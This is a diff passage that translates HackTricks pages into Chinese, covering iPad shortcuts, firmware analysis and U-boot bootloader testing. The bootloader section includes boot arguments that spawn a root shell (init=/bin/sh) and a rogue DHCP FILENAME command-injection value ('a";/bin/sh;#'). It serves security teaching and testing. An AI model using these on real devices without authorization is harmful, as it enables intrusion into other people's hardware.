+| F7       | 返回一首歌曲                                                                  |
+| F8       | 播放/暂停                                                                     |
+| F9       | 跳过歌曲                                                                      |
+| F10      | 静音                                                                           |
+| F11      | 降低音量                                                                |
+| F12      | 增加音量                                                                |
+| ⌘ Space  | 显示可用语言列表；要选择一种，请再次按空格键。 |
 
-### iPad navigation
+### iPad 导航
 
 | Shortcut                                           | Action                                                  |
 | -------------------------------------------------- | ------------------------------------------------------- |
-| ⌘H                                                 | Go to Home                                              |
-| ⌘⇧H (Command-Shift-H)                              | Go to Home                                              |
-| ⌘ (Space)                                          | Open Spotlight                                          |
-| ⌘⇥ (Command-Tab)                                   | List last ten used apps                                 |
-| ⌘\~                                                | Go t the last App                                       |
-| ⌘⇧3 (Command-Shift-3)                              | Screenshot (hovers in bottom left to save or act on it) |
-| ⌘⇧4                                                | Screenshot and open it in the editor                    |
-| Press and hold ⌘                                   | List of shortcuts available for the App                 |
-| ⌘⌥D (Command-Option/Alt-D)                         | Brings up the dock                                      |
-| ^⌥H (Control-Option-H)                             | Home button                                             |
-| ^⌥H H (Control-Option-H-H)                         | Show multitask bar                                      |
-| ^⌥I (Control-Option-i)                             | Item chooser                                            |
-| Escape                                             | Back button                                             |
-| → (Right arrow)                                    | Next item                                               |
-| ← (Left arrow)                                     | Previous item                                           |
-| ↑↓ (Up arrow, Down arrow)                          | Simultaneously tap selected item                        |
-| ⌥ ↓ (Option-Down arrow)                            | Scroll down                                             |
-| ⌥↑ (Option-Up arrow)                               | Scroll up                                               |
-| ⌥← or ⌥→ (Option-Left arrow or Option-Right arrow) | Scroll left or right                                    |
-| ^⌥S (Control-Option-S)                             | Turn VoiceOver speech on or off                         |
-| ⌘⇧⇥ (Command-Shift-Tab)                            | Switch to the previous app                              |
-| ⌘⇥ (Command-Tab)                                   | Switch back to the original app                         |
-| ←+→, then Option + ← or Option+→                   | Navigate through Dock                                   |
+| ⌘H                                                 | 返回主屏幕                                              |
+| ⌘⇧H (Command-Shift-H)                              | 返回主屏幕                                              |
+| ⌘ (Space)                                          | 打开 Spotlight                                          |
+| ⌘⇥ (Command-Tab)                                   | 列出最近使用的十个应用程序                                 |
+| ⌘\~                                                | 返回上一个应用程序                                       |
+| ⌘⇧3 (Command-Shift-3)                              | 截屏（悬停在左下角以保存或操作） |
+| ⌘⇧4                                                | 截屏并在编辑器中打开                    |
+| 按住 ⌘                                           | 列出可用于该应用程序的快捷键                 |
+| ⌘⌥D (Command-Option/Alt-D)                         | 显示停靠栏                                      |
+| ^⌥H (Control-Option-H)                             | 主屏幕按钮                                             |
+| ^⌥H H (Control-Option-H-H)                         | 显示多任务栏                                      |
+| ^⌥I (Control-Option-i)                             | 项目选择器                                            |
+| Escape                                             | 返回按钮                                             |
+| → (右箭头)                                    | 下一个项目                                               |
+| ← (左箭头)                                     | 上一个项目                                           |
+| ↑↓ (上箭头, 下箭头)                          | 同时点击选定项目                        |
+| ⌥ ↓ (Option-Down arrow)                            | 向下滚动                                             |
+| ⌥↑ (Option-Up arrow)                               | 向上滚动                                               |
+| ⌥← 或 ⌥→ (Option-Left arrow 或 Option-Right arrow) | 向左或向右滚动                                    |
+| ^⌥S (Control-Option-S)                             | 开启或关闭 VoiceOver 语音                         |
+| ⌘⇧⇥ (Command-Shift-Tab)                            | 切换到上一个应用程序                              |
+| ⌘⇥ (Command-Tab)                                   | 切换回原始应用程序                         |
+| ←+→, 然后 Option + ← 或 Option+→                   | 在停靠栏中导航                                   |
 
-### Safari shortcuts
+### Safari 快捷键
 
 | Shortcut                | Action                                           |
 | ----------------------- | ------------------------------------------------ |
-| ⌘L (Command-L)          | Open Location                                    |
-| ⌘T                      | Open a new tab                                   |
-| ⌘W                      | Close the current tab                            |
-| ⌘R                      | Refresh the current tab                          |
-| ⌘.                      | Stop loading the current tab                     |
-| ^⇥                      | Switch to the next tab                           |
-| ^⇧⇥ (Control-Shift-Tab) | Move to the previous tab                         |
-| ⌘L                      | Select the text input/URL field to modify it     |
-| ⌘⇧T (Command-Shift-T)   | Open last closed tab (can be used several times) |
-| ⌘\[                     | Goes back one page in your browsing history      |
-| ⌘]                      | Goes forward one page in your browsing history   |
-| ⌘⇧R                     | Activate Reader Mode                             |
+| ⌘L (Command-L)          | 打开位置                                    |
+| ⌘T                      | 打开新标签                                   |
+| ⌘W                      | 关闭当前标签                            |
+| ⌘R                      | 刷新当前标签                          |
+| ⌘.                      | 停止加载当前标签                     |
+| ^⇥                      | 切换到下一个标签                           |
+| ^⇧⇥ (Control-Shift-Tab) | 移动到上一个标签                         |
+| ⌘L                      | 选择文本输入/URL 字段以进行修改     |
+| ⌘⇧T (Command-Shift-T)   | 打开最后关闭的标签（可以多次使用） |
+| ⌘\[                     | 在浏览历史中返回一页      |
+| ⌘]                      | 在浏览历史中前进一页   |
+| ⌘⇧R                     | 激活阅读模式                             |
 
-### Mail shortcuts
+### 邮件快捷键
 
 | Shortcut                   | Action                       |
 | -------------------------- | ---------------------------- |
-| ⌘L                         | Open Location                |
-| ⌘T                         | Open a new tab               |
-| ⌘W                         | Close the current tab        |
-| ⌘R                         | Refresh the current tab      |
-| ⌘.                         | Stop loading the current tab |
-| ⌘⌥F (Command-Option/Alt-F) | Search in your mailbox       |
+| ⌘L                         | 打开位置                |
+| ⌘T                         | 打开新标签               |
+| ⌘W                         | 关闭当前标签        |
+| ⌘R                         | 刷新当前标签      |
+| ⌘.                         | 停止加载当前标签 |
+| ⌘⌥F (Command-Option/Alt-F) | 在您的邮箱中搜索       |
 
-# References
+# 参考文献
 
 - [https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html](https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html)
 - [https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html](https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html)
@@ -274,4 +274,3 @@ These shortcuts are for the visual settings and sound settings, depending on the
 - [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/physical-attacks/firmware-analysis/README.md b/src/physical-attacks/firmware-analysis/README.md
index 3ed5b4588..d658feac9 100644
--- a/src/physical-attacks/firmware-analysis/README.md
+++ b/src/physical-attacks/firmware-analysis/README.md
@@ -1,46 +1,45 @@
-# Firmware Analysis
+# 固件分析
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## **Introduction**
+## **介绍**
 
-Firmware is essential software that enables devices to operate correctly by managing and facilitating communication between the hardware components and the software that users interact with. It's stored in permanent memory, ensuring the device can access vital instructions from the moment it's powered on, leading to the operating system's launch. Examining and potentially modifying firmware is a critical step in identifying security vulnerabilities.
+固件是使设备正常运行的基本软件，通过管理和促进硬件组件与用户交互的软件之间的通信。它存储在永久内存中，确保设备在开机时能够访问重要指令，从而启动操作系统。检查和可能修改固件是识别安全漏洞的关键步骤。
 
-## **Gathering Information**
+## **收集信息**
 
-**Gathering information** is a critical initial step in understanding a device's makeup and the technologies it uses. This process involves collecting data on:
+**收集信息**是理解设备构成和所用技术的关键初步步骤。此过程涉及收集以下数据：
 
-- The CPU architecture and operating system it runs
-- Bootloader specifics
-- Hardware layout and datasheets
-- Codebase metrics and source locations
-- External libraries and license types
-- Update histories and regulatory certifications
-- Architectural and flow diagrams
-- Security assessments and identified vulnerabilities
+- CPU架构和运行的操作系统
+- 引导加载程序的具体信息
+- 硬件布局和数据表
+- 代码库指标和源位置
+- 外部库和许可证类型
+- 更新历史和监管认证
+- 架构和流程图
+- 安全评估和已识别的漏洞
 
-For this purpose, **open-source intelligence (OSINT)** tools are invaluable, as is the analysis of any available open-source software components through manual and automated review processes. Tools like [Coverity Scan](https://scan.coverity.com) and [Semmle’s LGTM](https://lgtm.com/#explore) offer free static analysis that can be leveraged to find potential issues.
+为此，**开源情报（OSINT）**工具是不可或缺的，同时通过手动和自动审查过程分析任何可用的开源软件组件也很重要。像[Coverity Scan](https://scan.coverity.com)和[Semmle’s LGTM](https://lgtm.com/#explore)这样的工具提供免费的静态分析，可以用来发现潜在问题。
 
-## **Acquiring the Firmware**
+## **获取固件**
 
-Obtaining firmware can be approached through various means, each with its own level of complexity:
+获取固件可以通过多种方式进行，每种方式的复杂程度不同：
 
-- **Directly** from the source (developers, manufacturers)
-- **Building** it from provided instructions
-- **Downloading** from official support sites
-- Utilizing **Google dork** queries for finding hosted firmware files
-- Accessing **cloud storage** directly, with tools like [S3Scanner](https://github.com/sa7mon/S3Scanner)
-- Intercepting **updates** via man-in-the-middle techniques
-- **Extracting** from the device through connections like **UART**, **JTAG**, or **PICit**
-- **Sniffing** for update requests within device communication
-- Identifying and using **hardcoded update endpoints**
-- **Dumping** from the bootloader or network
-- **Removing and reading** the storage chip, when all else fails, using appropriate hardware tools
+- **直接**从源头（开发者、制造商）
+- **根据**提供的说明进行**构建**
+- **从**官方支持网站**下载**
+- 利用**Google dork**查询查找托管的固件文件
+- 直接访问**云存储**，使用工具如[S3Scanner](https://github.com/sa7mon/S3Scanner)
+- 通过中间人技术**拦截**更新
+- 通过**UART**、**JTAG**或**PICit**等连接**提取**设备中的固件
+- 在设备通信中**嗅探**更新请求
+- 识别并使用**硬编码的更新端点**
+- 从引导加载程序或网络**转储**
+- 在万不得已时，**拆卸并读取**存储芯片，使用适当的硬件工具
 
-## Analyzing the firmware
-
-Now that you **have the firmware**, you need to extract information about it to know how to treat it. Different tools you can use for that:
+## 分析固件
 
+现在你**拥有固件**，你需要提取有关它的信息，以了解如何处理它。你可以使用的不同工具有：
 ```bash
 file <bin>
 strings -n8 <bin>
@@ -49,26 +48,24 @@ hexdump -C -n 512 <bin> > hexdump.out
 hexdump -C <bin> | head # might find signatures in header
 fdisk -lu <bin> #lists a drives partition and filesystems if multiple
 ```
+如果你使用这些工具没有找到太多信息，可以使用 `binwalk -E <bin>` 检查图像的 **熵**，如果熵低，那么它不太可能被加密。如果熵高，则很可能被加密（或以某种方式压缩）。
 
-If you don't find much with those tools check the **entropy** of the image with `binwalk -E <bin>`, if low entropy, then it's not likely to be encrypted. If high entropy, Its likely encrypted (or compressed in some way).
-
-Moreover, you can use these tools to extract **files embedded inside the firmware**:
+此外，你可以使用这些工具提取 **嵌入固件中的文件**：
 
 {{#ref}}
 ../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md
 {{#endref}}
 
-Or [**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/)) to inspect the file.
+或者 [**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/)) 来检查文件。
 
-### Getting the Filesystem
+### 获取文件系统
 
-With the previous commented tools like `binwalk -ev <bin>` you should have been able to **extract the filesystem**.\
-Binwalk usually extracts it inside a **folder named as the filesystem type**, which usually is one of the following: squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs.
+使用之前提到的工具，如 `binwalk -ev <bin>`，你应该能够 **提取文件系统**。\
+Binwalk 通常会将其提取到一个 **以文件系统类型命名的文件夹** 中，通常是以下之一：squashfs, ubifs, romfs, rootfs, jffs2, yaffs2, cramfs, initramfs。
 
-#### Manual Filesystem Extraction
-
-Sometimes, binwalk will **not have the magic byte of the filesystem in its signatures**. In these cases, use binwalk to **find the offset of the filesystem and carve the compressed filesystem** from the binary and **manually extract** the filesystem according to its type using the steps below.
+#### 手动文件系统提取
 
+有时，binwalk **在其签名中没有文件系统的魔术字节**。在这些情况下，使用 binwalk **找到文件系统的偏移量并从二进制文件中切割压缩的文件系统**，并根据其类型使用以下步骤 **手动提取** 文件系统。
 ```
 $ binwalk DIR850L_REVB.bin
 
@@ -80,9 +77,7 @@ DECIMAL HEXADECIMAL DESCRIPTION
 1704052 0x1A0074 PackImg section delimiter tag, little endian size: 32256 bytes; big endian size: 8257536 bytes
 1704084 0x1A0094 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 8256900 bytes, 2688 inodes, blocksize: 131072 bytes, created: 2016-07-12 02:28:41
 ```
-
-Run the following **dd command** carving the Squashfs filesystem.
-
+运行以下 **dd 命令** 切割 Squashfs 文件系统。
 ```
 $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
 
@@ -92,39 +87,37 @@ $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
 
 8257536 bytes (8.3 MB, 7.9 MiB) copied, 12.5777 s, 657 kB/s
 ```
-
-Alternatively, the following command could also be run.
+另外，可以运行以下命令。
 
 `$ dd if=DIR850L_REVB.bin bs=1 skip=$((0x1A0094)) of=dir.squashfs`
 
-- For squashfs (used in the example above)
+- 对于 squashfs（在上面的示例中使用）
 
 `$ unsquashfs dir.squashfs`
 
-Files will be in "`squashfs-root`" directory afterwards.
+文件将随后位于 "`squashfs-root`" 目录中。
 
-- CPIO archive files
+- CPIO 存档文件
 
 `$ cpio -ivd --no-absolute-filenames -F <bin>`
 
-- For jffs2 filesystems
+- 对于 jffs2 文件系统
 
 `$ jefferson rootfsfile.jffs2`
 
-- For ubifs filesystems with NAND flash
+- 对于带 NAND 闪存的 ubifs 文件系统
 
 `$ ubireader_extract_images -u UBI -s <start_offset> <bin>`
 
 `$ ubidump.py <bin>`
 
-## Analyzing Firmware
+## 分析固件
 
-Once the firmware is obtained, it's essential to dissect it for understanding its structure and potential vulnerabilities. This process involves utilizing various tools to analyze and extract valuable data from the firmware image.
+一旦获得固件，拆解它以理解其结构和潜在漏洞是至关重要的。此过程涉及利用各种工具分析和提取固件映像中的有价值数据。
 
-### Initial Analysis Tools
-
-A set of commands is provided for initial inspection of the binary file (referred to as `<bin>`). These commands help in identifying file types, extracting strings, analyzing binary data, and understanding the partition and filesystem details:
+### 初步分析工具
 
+提供了一组命令用于对二进制文件（称为 `<bin>`）进行初步检查。这些命令有助于识别文件类型、提取字符串、分析二进制数据以及理解分区和文件系统细节：
 ```bash
 file <bin>
 strings -n8 <bin>
@@ -133,123 +126,115 @@ hexdump -C -n 512 <bin> > hexdump.out
 hexdump -C <bin> | head #useful for finding signatures in the header
 fdisk -lu <bin> #lists partitions and filesystems, if there are multiple
 ```
+为了评估图像的加密状态，使用 `binwalk -E <bin>` 检查 **entropy**。低熵表明缺乏加密，而高熵则表示可能存在加密或压缩。
 
-To assess the encryption status of the image, the **entropy** is checked with `binwalk -E <bin>`. Low entropy suggests a lack of encryption, while high entropy indicates possible encryption or compression.
+对于提取 **embedded files**，建议使用 **file-data-carving-recovery-tools** 文档和 **binvis.io** 进行文件检查的工具和资源。
 
-For extracting **embedded files**, tools and resources like the **file-data-carving-recovery-tools** documentation and **binvis.io** for file inspection are recommended.
-
-### Extracting the Filesystem
-
-Using `binwalk -ev <bin>`, one can usually extract the filesystem, often into a directory named after the filesystem type (e.g., squashfs, ubifs). However, when **binwalk** fails to recognize the filesystem type due to missing magic bytes, manual extraction is necessary. This involves using `binwalk` to locate the filesystem's offset, followed by the `dd` command to carve out the filesystem:
+### 提取文件系统
 
+使用 `binwalk -ev <bin>`，通常可以提取文件系统，通常提取到一个以文件系统类型命名的目录中（例如，squashfs，ubifs）。然而，当 **binwalk** 由于缺少魔术字节而无法识别文件系统类型时，需要手动提取。这涉及使用 `binwalk` 定位文件系统的偏移量，然后使用 `dd` 命令提取文件系统：
 ```bash
 $ binwalk DIR850L_REVB.bin
 
 $ dd if=DIR850L_REVB.bin bs=1 skip=1704084 of=dir.squashfs
 ```
+之后，根据文件系统类型（例如，squashfs、cpio、jffs2、ubifs），使用不同的命令手动提取内容。
 
-Afterwards, depending on the filesystem type (e.g., squashfs, cpio, jffs2, ubifs), different commands are used to manually extract the contents.
+### 文件系统分析
 
-### Filesystem Analysis
+提取文件系统后，开始寻找安全漏洞。关注不安全的网络守护进程、硬编码的凭据、API 端点、更新服务器功能、未编译的代码、启动脚本和编译的二进制文件以进行离线分析。
 
-With the filesystem extracted, the search for security flaws begins. Attention is paid to insecure network daemons, hardcoded credentials, API endpoints, update server functionalities, uncompiled code, startup scripts, and compiled binaries for offline analysis.
+**关键位置**和**项目**检查包括：
 
-**Key locations** and **items** to inspect include:
+- **etc/shadow** 和 **etc/passwd** 中的用户凭据
+- **etc/ssl** 中的 SSL 证书和密钥
+- 配置和脚本文件中的潜在漏洞
+- 嵌入的二进制文件以进行进一步分析
+- 常见 IoT 设备的网络服务器和二进制文件
 
-- **etc/shadow** and **etc/passwd** for user credentials
-- SSL certificates and keys in **etc/ssl**
-- Configuration and script files for potential vulnerabilities
-- Embedded binaries for further analysis
-- Common IoT device web servers and binaries
+几个工具有助于揭示文件系统中的敏感信息和漏洞：
 
-Several tools assist in uncovering sensitive information and vulnerabilities within the filesystem:
+- [**LinPEAS**](https://github.com/carlospolop/PEASS-ng) 和 [**Firmwalker**](https://github.com/craigz28/firmwalker) 用于敏感信息搜索
+- [**固件分析和比较工具 (FACT)**](https://github.com/fkie-cad/FACT_core) 用于全面的固件分析
+- [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer)、[**ByteSweep**](https://gitlab.com/bytesweep/bytesweep)、[**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go) 和 [**EMBA**](https://github.com/e-m-b-a/emba) 用于静态和动态分析
 
-- [**LinPEAS**](https://github.com/carlospolop/PEASS-ng) and [**Firmwalker**](https://github.com/craigz28/firmwalker) for sensitive information search
-- [**The Firmware Analysis and Comparison Tool (FACT)**](https://github.com/fkie-cad/FACT_core) for comprehensive firmware analysis
-- [**FwAnalyzer**](https://github.com/cruise-automation/fwanalyzer), [**ByteSweep**](https://gitlab.com/bytesweep/bytesweep), [**ByteSweep-go**](https://gitlab.com/bytesweep/bytesweep-go), and [**EMBA**](https://github.com/e-m-b-a/emba) for static and dynamic analysis
+### 对编译二进制文件的安全检查
 
-### Security Checks on Compiled Binaries
+必须仔细检查文件系统中发现的源代码和编译的二进制文件以寻找漏洞。像 **checksec.sh** 这样的工具用于 Unix 二进制文件，**PESecurity** 用于 Windows 二进制文件，帮助识别可能被利用的未保护二进制文件。
 
-Both source code and compiled binaries found in the filesystem must be scrutinized for vulnerabilities. Tools like **checksec.sh** for Unix binaries and **PESecurity** for Windows binaries help identify unprotected binaries that could be exploited.
+## 模拟固件进行动态分析
 
-## Emulating Firmware for Dynamic Analysis
+模拟固件的过程使得可以对设备的操作或单个程序进行**动态分析**。这种方法可能会遇到硬件或架构依赖性的问题，但将根文件系统或特定二进制文件转移到具有匹配架构和字节序的设备（例如 Raspberry Pi）或预构建的虚拟机上，可以促进进一步的测试。
 
-The process of emulating firmware enables **dynamic analysis** either of a device's operation or an individual program. This approach can encounter challenges with hardware or architecture dependencies, but transferring the root filesystem or specific binaries to a device with matching architecture and endianness, such as a Raspberry Pi, or to a pre-built virtual machine, can facilitate further testing.
+### 模拟单个二进制文件
 
-### Emulating Individual Binaries
+在检查单个程序时，识别程序的字节序和 CPU 架构至关重要。
 
-For examining single programs, identifying the program's endianness and CPU architecture is crucial.
-
-#### Example with MIPS Architecture
-
-To emulate a MIPS architecture binary, one can use the command:
+#### MIPS 架构示例
 
+要模拟 MIPS 架构的二进制文件，可以使用以下命令：
 ```bash
 file ./squashfs-root/bin/busybox
 ```
-
-And to install the necessary emulation tools:
-
+并安装必要的仿真工具：
 ```bash
 sudo apt-get install qemu qemu-user qemu-user-static qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
 ```
+对于 MIPS（大端），使用 `qemu-mips`，而对于小端二进制文件，选择 `qemu-mipsel`。
 
-For MIPS (big-endian), `qemu-mips` is used, and for little-endian binaries, `qemu-mipsel` would be the choice.
+#### ARM 架构仿真
 
-#### ARM Architecture Emulation
+对于 ARM 二进制文件，过程类似，使用 `qemu-arm` 模拟器进行仿真。
 
-For ARM binaries, the process is similar, with the `qemu-arm` emulator being utilized for emulation.
+### 完整系统仿真
 
-### Full System Emulation
+像 [Firmadyne](https://github.com/firmadyne/firmadyne)、[Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit) 等工具，促进完整固件仿真，自动化过程并帮助动态分析。
 
-Tools like [Firmadyne](https://github.com/firmadyne/firmadyne), [Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit), and others, facilitate full firmware emulation, automating the process and aiding in dynamic analysis.
+## 实践中的动态分析
 
-## Dynamic Analysis in Practice
+在此阶段，使用真实或仿真设备环境进行分析。保持对操作系统和文件系统的 shell 访问至关重要。仿真可能无法完美模拟硬件交互，因此需要偶尔重新启动仿真。分析应重新访问文件系统，利用暴露的网页和网络服务，并探索引导加载程序漏洞。固件完整性测试对于识别潜在后门漏洞至关重要。
 
-At this stage, either a real or emulated device environment is used for analysis. It's essential to maintain shell access to the OS and filesystem. Emulation may not perfectly mimic hardware interactions, necessitating occasional emulation restarts. Analysis should revisit the filesystem, exploit exposed webpages and network services, and explore bootloader vulnerabilities. Firmware integrity tests are critical to identify potential backdoor vulnerabilities.
+## 运行时分析技术
 
-## Runtime Analysis Techniques
+运行时分析涉及在其操作环境中与进程或二进制文件交互，使用工具如 gdb-multiarch、Frida 和 Ghidra 设置断点，并通过模糊测试和其他技术识别漏洞。
 
-Runtime analysis involves interacting with a process or binary in its operating environment, using tools like gdb-multiarch, Frida, and Ghidra for setting breakpoints and identifying vulnerabilities through fuzzing and other techniques.
+## 二进制利用和概念验证
 
-## Binary Exploitation and Proof-of-Concept
+为识别的漏洞开发 PoC 需要对目标架构和低级语言编程有深入理解。嵌入式系统中的二进制运行时保护很少见，但在存在时，可能需要使用如返回导向编程（ROP）等技术。
 
-Developing a PoC for identified vulnerabilities requires a deep understanding of the target architecture and programming in lower-level languages. Binary runtime protections in embedded systems are rare, but when present, techniques like Return Oriented Programming (ROP) may be necessary.
+## 准备好的操作系统用于固件分析
 
-## Prepared Operating Systems for Firmware Analysis
+像 [AttifyOS](https://github.com/adi0x90/attifyos) 和 [EmbedOS](https://github.com/scriptingxss/EmbedOS) 这样的操作系统提供预配置的固件安全测试环境，配备必要的工具。
 
-Operating systems like [AttifyOS](https://github.com/adi0x90/attifyos) and [EmbedOS](https://github.com/scriptingxss/EmbedOS) provide pre-configured environments for firmware security testing, equipped with necessary tools.
+## 准备好的操作系统用于分析固件
 
-## Prepared OSs to analyze Firmware
+- [**AttifyOS**](https://github.com/adi0x90/attifyos)：AttifyOS 是一个旨在帮助您对物联网（IoT）设备进行安全评估和渗透测试的发行版。它通过提供一个预配置的环境，加载所有必要工具，节省了您大量时间。
+- [**EmbedOS**](https://github.com/scriptingxss/EmbedOS)：基于 Ubuntu 18.04 的嵌入式安全测试操作系统，预装固件安全测试工具。
 
-- [**AttifyOS**](https://github.com/adi0x90/attifyos): AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded.
-- [**EmbedOS**](https://github.com/scriptingxss/EmbedOS): Embedded security testing operating system based on Ubuntu 18.04 preloaded with firmware security testing tools.
+## 漏洞固件练习
 
-## Vulnerable firmware to practice
-
-To practice discovering vulnerabilities in firmware, use the following vulnerable firmware projects as a starting point.
+要练习发现固件中的漏洞，可以使用以下漏洞固件项目作为起点。
 
 - OWASP IoTGoat
-  - [https://github.com/OWASP/IoTGoat](https://github.com/OWASP/IoTGoat)
-- The Damn Vulnerable Router Firmware Project
-  - [https://github.com/praetorian-code/DVRF](https://github.com/praetorian-code/DVRF)
+- [https://github.com/OWASP/IoTGoat](https://github.com/OWASP/IoTGoat)
+- Damn Vulnerable Router Firmware Project
+- [https://github.com/praetorian-code/DVRF](https://github.com/praetorian-code/DVRF)
 - Damn Vulnerable ARM Router (DVAR)
-  - [https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html](https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html)
+- [https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html](https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html)
 - ARM-X
-  - [https://github.com/therealsaumil/armx#downloads](https://github.com/therealsaumil/armx#downloads)
+- [https://github.com/therealsaumil/armx#downloads](https://github.com/therealsaumil/armx#downloads)
 - Azeria Labs VM 2.0
-  - [https://azeria-labs.com/lab-vm-2-0/](https://azeria-labs.com/lab-vm-2-0/)
+- [https://azeria-labs.com/lab-vm-2-0/](https://azeria-labs.com/lab-vm-2-0/)
 - Damn Vulnerable IoT Device (DVID)
-  - [https://github.com/Vulcainreo/DVID](https://github.com/Vulcainreo/DVID)
+- [https://github.com/Vulcainreo/DVID](https://github.com/Vulcainreo/DVID)
 
-## References
+## 参考文献
 
 - [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
 - [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://www.amazon.co.uk/Practical-IoT-Hacking-F-Chantzis/dp/1718500904)
 
-## Trainning and Cert
+## 培训和认证
 
 - [https://www.attify-store.com/products/offensive-iot-exploitation](https://www.attify-store.com/products/offensive-iot-exploitation)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/physical-attacks/firmware-analysis/bootloader-testing.md b/src/physical-attacks/firmware-analysis/bootloader-testing.md
index 53ce0e7d5..96b1ec1df 100644
--- a/src/physical-attacks/firmware-analysis/bootloader-testing.md
+++ b/src/physical-attacks/firmware-analysis/bootloader-testing.md
@@ -1,53 +1,52 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-The following steps are recommended for modifying device startup configurations and bootloaders like U-boot:
+以下步骤建议用于修改设备启动配置和引导加载程序，如 U-boot：
 
-1. **Access Bootloader's Interpreter Shell**:
+1. **访问引导加载程序的解释器 shell**：
 
-   - During boot, press "0", space, or other identified "magic codes" to access the bootloader's interpreter shell.
+- 在启动期间，按 "0"、空格或其他识别的 "魔法代码" 以访问引导加载程序的解释器 shell。
 
-2. **Modify Boot Arguments**:
+2. **修改引导参数**：
 
-   - Execute the following commands to append '`init=/bin/sh`' to the boot arguments, allowing execution of a shell command:
-     %%%
-     #printenv
-     #setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash:<partitiionInfo> rootfstype=<fstype> hasEeprom=0 5srst=0 init=/bin/sh
-     #saveenv
-     #boot
-     %%%
+- 执行以下命令将 '`init=/bin/sh`' 附加到引导参数，允许执行 shell 命令：
+%%%
+#printenv
+#setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash:<partitiionInfo> rootfstype=<fstype> hasEeprom=0 5srst=0 init=/bin/sh
+#saveenv
+#boot
+%%%
 
-3. **Setup TFTP Server**:
+3. **设置 TFTP 服务器**：
 
-   - Configure a TFTP server to load images over a local network:
-     %%%
-     #setenv ipaddr 192.168.2.2 #local IP of the device
-     #setenv serverip 192.168.2.1 #TFTP server IP
-     #saveenv
-     #reset
-     #ping 192.168.2.1 #check network access
-     #tftp ${loadaddr} uImage-3.6.35 #loadaddr takes the address to load the file into and the filename of the image on the TFTP server
-     %%%
+- 配置 TFTP 服务器以通过本地网络加载映像：
+%%%
+#setenv ipaddr 192.168.2.2 #设备的本地 IP
+#setenv serverip 192.168.2.1 #TFTP 服务器 IP
+#saveenv
+#reset
+#ping 192.168.2.1 #检查网络访问
+#tftp ${loadaddr} uImage-3.6.35 #loadaddr 是加载文件的地址和 TFTP 服务器上映像的文件名
+%%%
 
-4. **Utilize `ubootwrite.py`**:
+4. **使用 `ubootwrite.py`**：
 
-   - Use `ubootwrite.py` to write the U-boot image and push a modified firmware to gain root access.
+- 使用 `ubootwrite.py` 写入 U-boot 映像并推送修改后的固件以获得 root 访问权限。
 
-5. **Check Debug Features**:
+5. **检查调试功能**：
 
-   - Verify if debug features like verbose logging, loading arbitrary kernels, or booting from untrusted sources are enabled.
+- 验证是否启用了调试功能，如详细日志记录、加载任意内核或从不受信任的来源启动。
 
-6. **Cautionary Hardware Interference**:
+6. **谨慎的硬件干扰**：
 
-   - Be cautious when connecting one pin to ground and interacting with SPI or NAND flash chips during the device boot-up sequence, particularly before the kernel decompresses. Consult the NAND flash chip's datasheet before shorting pins.
+- 在设备启动序列期间，特别是在内核解压缩之前，连接一个引脚到地并与 SPI 或 NAND 闪存芯片交互时要小心。在短接引脚之前，请查阅 NAND 闪存芯片的数据手册。
 
-7. **Configure Rogue DHCP Server**:
-   - Set up a rogue DHCP server with malicious parameters for a device to ingest during a PXE boot. Utilize tools like Metasploit's (MSF) DHCP auxiliary server. Modify the 'FILENAME' parameter with command injection commands such as `'a";/bin/sh;#'` to test input validation for device startup procedures.
+7. **配置恶意 DHCP 服务器**：
+- 设置一个恶意 DHCP 服务器，使用恶意参数供设备在 PXE 启动期间获取。利用 Metasploit 的 (MSF) DHCP 辅助服务器等工具。修改 'FILENAME' 参数，使用命令注入命令，如 `'a";/bin/sh;#'` 来测试设备启动程序的输入验证。
 
-**Note**: The steps involving physical interaction with device pins (\*marked with asterisks) should be approached with extreme caution to avoid damaging the device.
+**注意**：涉及与设备引脚物理交互的步骤（\*用星号标记）应极其谨慎，以避免损坏设备。
 
-## References
+## 参考文献
 
 - [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/physical-attacks/firmware-analysis/firmware-integrity.md b/src/physical-attacks/firmware-analysis/firmware-integrity.md
index e0555f08f..c261bdea6 100644
--- a/src/physical-attacks/firmware-analysis/firmware-integrity.md
+++ b/src/physical-attacks/firmware-analysis/firmware-integrity.md
@@ -1,36 +1,35 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-## Firmware Integrity
